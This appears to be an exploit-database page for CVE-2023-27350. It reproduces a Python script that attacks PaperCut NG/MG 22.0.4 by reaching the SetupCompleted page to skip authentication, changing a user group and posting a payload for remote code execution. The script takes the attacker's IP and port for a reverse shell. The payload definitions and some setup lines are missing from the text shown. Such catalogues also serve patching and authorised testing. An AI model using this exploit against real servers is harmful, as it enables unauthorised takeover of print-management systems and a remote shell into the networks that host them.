Exploits / Vulnerability Discovered : 2023-05-23 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Papercut ng/mg 22.0.4 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
# Date: 13 May 2023
# Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350
parser = argparse.ArgumentParser(description="Papercut RCE")
parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /')
parser.add_argument('--ip',help='our rev shell ip')
parser.add_argument('--port',help='our rev shell port')
args = parser.parse_args()
# visit the first URL to set up the session
setup_url = url+"/app?service=page/SetupCompleted"
response = session.get(setup_url)
response.raise_for_status() # check for any errors
# visit the second URL using the same session
dashboard_url = url+"/app?service=page/Dashboard"
response = session.get(dashboard_url)
response.raise_for_status() # check for any errors
# URL to change user group
user_group_change_url = url+"/app"
response = session.post(user_group_change_url,data=Group_payload)
response.raise_for_status() # check for errors
# URL to gain RCE
rce_url = url+"/app"
response = session.post(rce_url,data=final_payload)
response.raise_for_status() # Check for any errors